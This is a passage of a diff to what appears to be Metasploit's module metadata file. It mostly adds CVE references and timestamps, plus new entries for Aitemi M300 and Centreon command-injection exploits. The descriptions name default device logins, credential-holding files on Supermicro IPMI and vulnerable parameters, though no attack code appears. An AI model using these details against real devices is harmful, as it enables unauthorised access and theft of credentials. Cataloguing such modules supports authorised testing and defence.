    "description": "This module exploits an unauthenticated directory traversal vulnerability\n          in the Dicoogle PACS Web Server v2.5.0 and possibly earlier, allowing an\n          attacker to read arbitrary files with the web server privileges.\n          While the application is java based, the directory traversal was only\n          successful against Windows targets.",
    "references": [
+      "CVE-2018-25113",
      "EDB-45007"
    ],
    "platform": "",
@@ -33778,7 +34035,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/dicoogle_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dicoogle_traversal",
@@ -34327,6 +34584,7 @@
    ],
    "description": "Dolibarr version 16 < 16.0.5 is vulnerable to a pre-authentication contact database dump.\n          An unauthenticated attacker may retrieve a company's entire customer file, prospects, suppliers,\n          and potentially employee information if a contact file exists.\n          Both public and private notes are also included in the dump.",
    "references": [
+      "CVE-2023-33568",
      "URL-https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/",
      "URL-https://github.com/Dolibarr/dolibarr/blob/16.0.5/ChangeLog#L34",
      "URL-https://github.com/Dolibarr/dolibarr/commit/bb7b69ef43673ed403436eac05e0bc31d5033ff7",
@@ -34351,7 +34609,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-25 11:20:47 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/dolibarr_16_contact_dump.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dolibarr_16_contact_dump",
@@ -34871,7 +35129,8 @@
    "description": "This module exploits an OS Command Injection vulnerability in Cambium\n          ePMP 1000 (<v2.5) device management portal. It requires any one of the\n          following login credentials - admin/admin, installer/installer, home/home - to\n          dump system hashes.",
    "references": [
      "URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/",
-      "URL-https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83"
+      "URL-https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83",
+      "ATT&CK-T1003"
    ],
    "platform": "",
    "arch": "",
@@ -34892,7 +35151,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_dump_hashes",
@@ -34982,6 +35241,7 @@
    ],
    "description": "This module exploits an OS Command Injection vulnerability in Cambium\n          ePMP 1000 (<v2.5) device management portal. It requires any one of the\n          following login credentials - admin/admin, installer/installer, home/home - to\n          execute arbitrary system commands.",
    "references": [
+      "CVE-2017-5255",
      "URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/",
      "URL-https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83"
    ],
@@ -35004,7 +35264,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/epmp1000_ping_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_ping_cmd_exec",
@@ -37500,6 +37760,7 @@
    ],
    "description": "This module allows for traversing the file system of a host running httpdasm v0.92.",
    "references": [
+      "CVE-2010-10012",
      "EDB-15861"
    ],
    "platform": "",
@@ -37521,7 +37782,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/httpdasm_directory_traversal",
@@ -38761,6 +39022,7 @@
    ],
    "description": "This module attempts to test whether a file traversal vulnerability\n          is present in version of linknat vos2009/vos3000",
    "references": [
+      "CVE-2025-34118",
      "URL-http://www.linknat.com/",
      "URL-http://www.wooyun.org/bugs/wooyun-2010-0145458"
    ],
@@ -38783,7 +39045,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/linknat_vos_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/linknat_vos_traversal",
@@ -38817,6 +39079,7 @@
    ],
    "description": "This module exploits a directory traversal vulnerability which is present in\n        different Linksys home routers, like the E1500.",
    "references": [
+      "CVE-2013-10062",
      "URL-http://www.s3cur1ty.de/m1adv2013-004",
      "URL-http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml",
      "BID-57760",
@@ -38842,7 +39105,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/linksys_e1500_traversal",
@@ -39842,6 +40105,7 @@
    ],
    "description": "This module exploits a directory traversal vulnerability which is present in\n        Netgear SPH200D Skype telephone.",
    "references": [
+      "CVE-2013-10063",
      "BID-57660",
      "EDB-24441",
      "URL-http://support.netgear.com/product/SPH200D",
@@ -39866,7 +40130,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/netgear_sph200d_traversal",
@@ -41231,6 +41495,57 @@
    "needs_cleanup": false,
    "actions": []
  },
+  "auxiliary_scanner/http/redoc_exposed": {
+    "name": "ReDoc API Docs UI Exposed",
+    "fullname": "auxiliary/scanner/http/redoc_exposed",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Hamza Sahin ( <Hamza Sahin (@hamzasahin61)>"
+    ],
+    "description": "Detects publicly exposed ReDoc API documentation pages.\n          The module performs safe, read-only GET requests and reports likely\n          ReDoc instances based on HTML markers.",
+    "references": [],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-10-08 03:43:31 +0000",
+    "path": "/modules/auxiliary/scanner/http/redoc_exposed.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/redoc_exposed",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
  "auxiliary_scanner/http/replace_ext": {
    "name": "HTTP File Extension Scanner",
    "fullname": "auxiliary/scanner/http/replace_ext",
@@ -41396,6 +41711,7 @@
    ],
    "description": "This module exploits a directory traversal vulnerability in the RIPS Scanner v0.54,\n          allowing to read arbitrary files with the web server privileges.",
    "references": [
+      "CVE-2025-34126",
      "EDB-18660",
      "URL-http://codesec.blogspot.com/2015/03/rips-scanner-v-054-local-file-include.html"
    ],
@@ -41418,7 +41734,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/rips_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rips_traversal",
@@ -41453,6 +41769,7 @@
    ],
    "description": "This module exploits an authenticated arbitrary file read in the log module's filter engine.\n          SteelHead VCX (VCX255U) version 9.6.0a was confirmed as vulnerable.",
    "references": [
+      "CVE-2025-34098",
      "EDB-42101"
    ],
    "platform": "",
@@ -41474,7 +41791,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/riverbed_steelhead_vcx_file_read",
@@ -41577,6 +41894,7 @@
    ],
    "description": "This module exploits a directory traversal vulnerability found in S40 CMS.\n          The flaw is due to the 'page' function not properly handling the $pid parameter,\n          which allows a malicious user to load an arbitrary file path.",
    "references": [
+      "CVE-2011-10009",
      "OSVDB-82469",
      "EDB-17129"
    ],
@@ -41599,7 +41917,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/s40_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/s40_traversal",
@@ -41910,6 +42228,7 @@
    ],
    "description": "This module exploits an unauthenticated path traversal vulnerability found in ManageEngine\n          ServiceDesk Plus build 9110 and lower. The module will retrieve any file on the filesystem\n          with the same privileges as Support Center Plus is running. On Windows, files can be retrieved\n          with SYSTEM privileges. The issue has been resolved in ServiceDesk Plus build 91111 (issue SD-60283).",
    "references": [
+      "CVE-2011-2757",
      "URL-https://www.manageengine.com/products/service-desk/readme-9.1.html"
    ],
    "platform": "",
@@ -41931,7 +42250,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/servicedesk_plus_traversal",
@@ -42288,6 +42607,7 @@
    ],
    "description": "This module abuses a directory traversal vulnerability in the url_redirect.cgi application\n          accessible through the web interface of Supermicro Onboard IPMI controllers.  The vulnerability\n          is present due to a lack of sanitization of the url_name parameter. This allows an attacker with\n          a valid, but not necessarily administrator-level account, to access the contents of any file\n          on the system. This includes the /nv/PSBlock file, which contains the cleartext credentials for\n          all configured accounts. This module has been tested on a Supermicro Onboard IPMI (X9SCL/X9SCM)\n          with firmware version SMT_X9_214. Other file names to try include /PSStore, /PMConfig.dat, and\n          /wsman/simple_auth.passwd",
    "references": [
+      "CVE-2013-6785",
      "URL-https://www.rapid7.com/blog/post/2013/11/06/supermicro-ipmi-firmware-vulnerabilities/",
      "URL-https://github.com/zenfish/ipmi/blob/master/dump_SM.py"
    ],
@@ -42310,7 +42630,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_url_redirect_traversal",
@@ -42398,6 +42718,7 @@
    ],
    "description": "This module exploits a directory traversal bug in Sockso on port\n          4444.  This is done by using \"../\" in the path to retrieve a file on\n          a vulnerable machine.",
    "references": [
+      "CVE-2012-10061",
      "URL-http://aluigi.altervista.org/adv/sockso_1-adv.txt"
    ],
    "platform": "",
@@ -42419,7 +42740,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/sockso_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sockso_traversal",
@@ -44584,6 +44905,7 @@
    ],
    "description": "This module exploits a directory traversal vulnerability found in WebPageTest.\n          Due to the way the gettext.php script handles the 'file' parameter, it is possible\n          to read a file outside the www directory.",
    "references": [
+      "CVE-2019-17199",
      "EDB-19790",
      "OSVDB-83817"
    ],
@@ -44606,7 +44928,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/webpagetest_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webpagetest_traversal",
@@ -45208,6 +45530,7 @@
    ],
    "description": "Abandoned Cart, a plugin for WordPress which extends the WooCommerce plugin,\n          prior to 5.8.2 is affected by an unauthenticated SQL injection via the\n          billing_first_name parameter of the save_data AJAX call.  A valid\n          wp_woocommerce_session cookie is required, which has at least one item in the\n          cart.",
    "references": [
+      "CVE-2025-47608",
      "WPVDB-10461",
      "URL-https://wpdeeply.com/woocommerce-abandoned-cart-before-5-8-2-sql-injection/",
      "URL-https://plugins.trac.wordpress.org/changeset/2413885"
@@ -45231,7 +45554,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-04-12 13:09:34 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/wp_abandoned_cart_sqli.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_abandoned_cart_sqli",
@@ -45270,6 +45593,7 @@
    ],
    "description": "An arbitrary file deletion vulnerability in the WordPress core allows any user with privileges of an\n          Author to completely take over the WordPress site and to execute arbitrary code on the server.",
    "references": [
+      "CVE-2018-12895",
      "WPVDB-9100",
      "EDB-44949",
      "PACKETSTORM-148333",
@@ -45295,7 +45619,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_arbitrary_file_deletion",
@@ -45801,6 +46125,7 @@
    ],
    "description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n          GI-Media Library version 2.2.2, allowing to read arbitrary files from the\n          system with the web server privileges. This module has been tested successfully\n          on GI-Media Library version 2.2.2 with WordPress 4.1.3 on Ubuntu 12.04 Server.",
    "references": [
+      "CVE-2015-10136",
      "WPVDB-7754",
      "URL-http://web.archive.org/web/20191021124407/http://wordpressa.quantika14.com/repository/index.php?id=24"
    ],
@@ -45823,7 +46148,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_gimedia_library_file_read",
@@ -46110,6 +46435,7 @@
    ],
    "description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n          \"WP Mobile Edition\" version 2.2.7, allowing to read arbitrary files with the\n          web server privileges.",
    "references": [
+      "CVE-2015-9406",
      "EDB-36733",
      "WPVDB-7898"
    ],
@@ -46132,7 +46458,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_mobileedition_file_read",
@@ -46230,6 +46556,7 @@
    ],
    "description": "This module exploits an authenticated directory traversal vulnerability\n          in WordPress Plugin \"NextGEN Gallery\" version 2.1.7, allowing\n          to read arbitrary directories with the web server privileges.",
    "references": [
+      "CVE-2015-9538",
      "WPVDB-8165",
      "URL-http://permalink.gmane.org/gmane.comp.security.oss.general/17650"
    ],
@@ -46252,7 +46579,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_nextgen_galley_file_read",
@@ -46527,6 +46854,7 @@
    ],
    "description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n          \"Simple Backup\" version 2.7.10, allowing to read arbitrary files with the\n          web server privileges.",
    "references": [
+      "CVE-2015-10134",
      "WPVDB-7997",
      "PACKETSTORM-131919"
    ],
@@ -46549,7 +46877,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_simple_backup_file_read",
@@ -46584,6 +46912,7 @@
    ],
    "description": "This module exploits an authenticated directory traversal vulnerability\n          in WordPress Plugin \"Subscribe to Comments\" version 2.1.2, allowing\n          to read arbitrary files with the web server privileges.",
    "references": [
+      "CVE-2015-10133",
      "WPVDB-8102",
      "PACKETSTORM-132694",
      "URL-https://advisories.dxw.com/advisories/admin-only-local-file-inclusion-and-arbitrary-code-execution-in-subscribe-to-comments-2-1-2/"
@@ -46607,7 +46936,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_subscribe_comments_file_read",
@@ -46703,6 +47032,7 @@
    ],
    "description": "This module exploits an unauthenticated database backup vulnerability in WordPress plugin\n          'Boldgrid-Backup' also known as 'Total Upkeep' version < 1.14.10.\n          First, `env-info.php` is read to get server information.  Next, `restore-info.json` is\n          read to retrieve the last backup file.  That backup is then downloaded, and any sql\n          files will be parsed looking for the wp_users INSERT statement to grab user creds.",
    "references": [
+      "CVE-2020-36848",
      "EDB-49252",
      "WPVDB-10502",
      "WPVDB-10503",
@@ -46727,7 +47057,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-04-12 13:09:34 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/wp_total_upkeep_downloader.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_total_upkeep_downloader",
@@ -47198,6 +47528,7 @@
    ],
    "description": "This module exploits a authenticated directory traversal vulnerability in Zen Load\n          Balancer `v3.10.1`. The flaw exists in 'index.cgi' not properly handling 'filelog='\n          parameter which allows a malicious actor to load arbitrary file path.",
    "references": [
+      "CVE-2020-11491",
      "EDB-48308"
    ],
    "platform": "",
@@ -47219,7 +47550,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-02-03 18:12:53 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/http/zenload_balancer_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zenload_balancer_traversal",
@@ -47772,7 +48103,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-08-11 16:37:37 +0000",
+    "mod_time": "2025-02-12 17:47:18 +0000",
    "path": "/modules/auxiliary/scanner/ldap/ldap_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ldap/ldap_login",
@@ -48221,6 +48552,7 @@
    ],
    "description": "Retrieve CUPS version and kernel version information from cups-browsed services.",
    "references": [
+      "CVE-2024-47176",
      "URL-https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8",
      "URL-https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/"
    ],
@@ -48230,7 +48562,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2024-09-28 02:35:39 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/misc/cups_browsed_info_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/cups_browsed_info_disclosure",
@@ -48375,6 +48707,7 @@
    ],
    "description": "This module exploits a file retrieval vulnerability in\n          EasyCafe Server. The vulnerability can be triggered by\n          sending a specially crafted packet (opcode 0x43) to the\n          831/TCP port.\n          This module has been successfully tested on EasyCafe Server\n          version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3\n          and Windows 7 SP1.\n          Note that the server will throw a popup messagebox if the\n          specified file does not exist.",
    "references": [
+      "CVE-2025-34119",
      "EDB-39102"
    ],
    "platform": "",
@@ -48383,7 +48716,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/easycafe_server_fileaccess",
@@ -51508,7 +51841,7 @@
      "postgres"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-09-02 16:31:33 +0000",
    "path": "/modules/auxiliary/scanner/postgres/postgres_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_login",
@@ -55714,7 +56047,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-09-12 14:27:32 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
@@ -56837,14 +57170,16 @@
      "Nicholas Starke <nick@alephvoid.com>"
    ],
    "description": "This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x.\n          The 'karaf' user has a known default password, which can be used to login to the\n          SSH service, and execute operating system commands from remote.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.008"
+    ],
    "platform": "Unix",
    "arch": "cmd",
    "rport": 8101,
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/apache_karaf_command_execution",
@@ -57363,7 +57698,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-09-15 14:08:25 +0000",
    "path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login_pubkey",
@@ -57617,7 +57952,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-08-22 14:00:32 +0000",
+    "mod_time": "2025-09-03 11:08:43 +0000",
    "path": "/modules/auxiliary/scanner/ssl/ssl_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssl/ssl_version",
@@ -66351,7 +66686,7 @@
    "targets": [
      "Apple iOS"
    ],
-    "mod_time": "2024-11-18 17:32:48 +0000",
+    "mod_time": "2025-10-24 18:02:35 +0000",
    "path": "/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/ssh/cydia_default_ssh",
@@ -67497,6 +67832,7 @@
    ],
    "description": "This module exploits a command injection vulnerability found in the eScan Web Management\n          Console. The vulnerability exists while processing CheckPass login requests. An attacker\n          with a valid username can use a malformed password to execute arbitrary commands. With\n          mwconf privileges, the runasroot utility can be abused to get root privileges. This module\n          has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.",
    "references": [
+      "CVE-2014-125118",
      "URL-http://www.joxeankoret.com/download/breaking_av_software-pdf.tar.gz"
    ],
    "platform": "Linux",
@@ -67520,7 +67856,7 @@
    "targets": [
      "eScan 5.5-2 / Linux"
    ],
-    "mod_time": "2025-05-10 18:15:04 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/antivirus/escan_password_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/antivirus/escan_password_exec",
@@ -68023,6 +68359,64 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/aitemi_m300_time_rce": {
+    "name": "Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (time param)",
+    "fullname": "exploit/linux/http/aitemi_m300_time_rce",
+    "aliases": [],
+    "rank": 400,
+    "disclosure_date": "2025-08-07",
+    "type": "exploit",
+    "author": [
+      "Valentin Lobstein"
+    ],
+    "description": "This module exploits an unauthenticated remote command injection vulnerability\n          in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02). The vulnerability\n          lies in the 'time' parameter of the time configuration endpoint, which is passed\n          unsanitized to a shell command executed via the `date -s` mechanism. The injection\n          executes with root privileges, without requiring authentication, reboot, or\n          network reconfiguration.",
+    "references": [
+      "URL-https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/",
+      "CVE-2025-34152"
+    ],
+    "platform": "Unix",
+    "arch": "cmd, mipsbe",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Meterpreter MIPSBE (MAY crash HTTP worker)"
+    ],
+    "mod_time": "2025-08-14 16:37:13 +0000",
+    "path": "/modules/exploits/linux/http/aitemi_m300_time_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/aitemi_m300_time_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/alcatel_omnipcx_mastercgi_exec": {
    "name": "Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",
    "fullname": "exploit/linux/http/alcatel_omnipcx_mastercgi_exec",
@@ -69068,6 +69462,7 @@
    ],
    "description": "This module exploits vulnerabilities found in Astium astium-confweb-2.1-25399 RPM and\n          lower. A SQL Injection vulnerability is used to achieve authentication bypass and gain\n          admin access. From an admin session arbitrary PHP code upload is possible. It is used\n          to add the final PHP payload to \"/usr/local/astium/web/php/config.php\" and execute the\n          \"sudo /sbin/service astcfgd reload\" command to reload the configuration and achieve\n          remote root code execution.",
    "references": [
+      "CVE-2013-10043",
      "OSVDB-88860",
      "EDB-23831"
    ],
@@ -69092,7 +69487,7 @@
    "targets": [
      "Astium 2.1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/astium_sqli_upload.rb",
    "is_install_path": true,
    "ref_name": "linux/http/astium_sqli_upload",
@@ -69185,6 +69580,8 @@
    ],
    "description": "This module exploits a directory traversal vulnerability in ATutor on an Apache/PHP\n          setup with display_errors set to On, which can be used to allow us to upload a malicious\n          ZIP file. On the web application, a blacklist verification is performed before extraction,\n          however it is not sufficient to prevent exploitation.\n\n          You are required to login to the target to reach the vulnerability, however this can be\n          done as a student account and remote registration is enabled by default.\n\n          Just in case remote registration isn't enabled, this module uses 2 vulnerabilities\n          in order to bypass the authentication:\n\n          1. confirm.php Authentication Bypass Type Juggling vulnerability\n          2. password_reminder.php Remote Password Reset TOCTOU vulnerability",
    "references": [
+      "CVE-2016-2555",
+      "CVE-2017-1000002",
      "URL-http://www.atutor.ca/",
      "URL-http://sourceincite.com/research/src-2016-09/",
      "URL-http://sourceincite.com/research/src-2016-10/",
@@ -69212,7 +69609,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-07 14:03:32 +0000",
    "path": "/modules/exploits/linux/http/atutor_filemanager_traversal.rb",
    "is_install_path": true,
    "ref_name": "linux/http/atutor_filemanager_traversal",
@@ -69848,6 +70245,66 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/centreon_auth_rce_cve_2025_5946": {
+    "name": "Centreon authenticated command injection leading to RCE via broker engine \"reload\" parameter",
+    "fullname": "exploit/linux/http/centreon_auth_rce_cve_2025_5946",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-09-24",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "Centreon is a platform designed to monitor your cloud and on-premises infrastructure.\n          This module exploits an command injection vulnerability using the `broker engine reload` setting\n          on the poller configuration page of the Centreon web application. Injecting a malcious payload\n          at the `broker engine reload` parameter and restarting the poller triggers this vulnerability.\n          You need have admin access at the Centreon Web application in order to execute this RCE.\n          This issue affects all Centreon editions >= `19.10.0` and it is fixed in Centreon Web versions\n          `24.10.13`, `24.04.18` and `23.10.28`.",
+    "references": [
+      "CVE-2025-5946",
+      "URL-https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-5946-centreon-web-all-versions-high-severity-5104",
+      "URL-https://attackerkb.com/topics/23D4cUoBZj/cve-2025-5946"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix/Linux Command"
+    ],
+    "mod_time": "2025-11-05 09:20:13 +0000",
+    "path": "/modules/exploits/linux/http/centreon_auth_rce_cve_2025_5946.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/centreon_auth_rce_cve_2025_5946",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs",
+        "config-changes"
